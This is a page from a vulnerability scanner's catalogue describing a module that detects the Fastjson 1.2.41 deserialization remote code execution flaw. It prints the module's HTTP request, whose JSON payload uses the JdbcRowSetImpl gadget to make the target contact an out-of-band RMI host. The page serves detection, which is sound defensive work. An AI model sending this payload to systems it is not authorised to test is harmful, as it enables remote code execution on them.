Ethical Hacking Automation

Automate Recon and scanning process with Vidoc. All security teams in one place

Fastjson 1.2.41 - Remote Code Execution

By kannthu

Critical
Vidoc logoVidoc Module
#fastjson#rce#deserialization#oast
Description

What is "Fastjson 1.2.41 - Remote Code Execution?"

The "Fastjson 1.2.41 - Remote Code Execution" module is designed to detect a critical vulnerability in the Fastjson 1.2.41 software. Fastjson is a Java library used for parsing and generating JSON data. This module specifically targets the Fastjson version 1.2.41 and aims to identify instances where remote code execution (RCE) can occur.

This vulnerability poses a significant risk as it allows attackers to execute arbitrary code on the target system, potentially leading to unauthorized access, data breaches, and system compromise. It is crucial to address this vulnerability promptly to prevent potential exploitation.

The severity of this vulnerability is classified as critical, indicating the high potential for damage and the urgent need for mitigation.

Impact

If successfully exploited, the "Fastjson 1.2.41 - Remote Code Execution" vulnerability can allow attackers to execute arbitrary code on the target system. This can lead to various consequences, including:

- Unauthorized access to sensitive data - System compromise - Execution of malicious commands - Disruption of services

Given the severity of this vulnerability, it is crucial to take immediate action to remediate the issue and protect the affected systems.

How the module works?

The "Fastjson 1.2.41 - Remote Code Execution" module works by sending a crafted HTTP request to the target system. The request is designed to exploit the specific vulnerability present in Fastjson 1.2.41, which allows for remote code execution.

One example of the HTTP request used by this module is:

POST / HTTP/1.1
Host: <Hostname>
Content-Type: application/json

{
   "@type":"Lcom.sun.rowset.JdbcRowSetImpl",
   "dataSourceName":"rmi://<InteractionURL>/Exploit",
   "autoCommit":true
}

The module includes matching conditions to determine if the vulnerability is present. In this case, the matching conditions include:

- Checking for the presence of the "dns" protocol in the response - Verifying that the HTTP response status is not 200

If both matching conditions are met, the module identifies the presence of the vulnerability and reports it as a critical issue.

It is essential to regularly scan and patch systems running Fastjson 1.2.41 to mitigate the risk of remote code execution.

Module preview

Concurrent Requests (1)
1. HTTP Request template
Raw request
Matching conditions
word: dnsand
NOT status: 200
Passive global matcher
No matching conditions.
On match action
Report vulnerability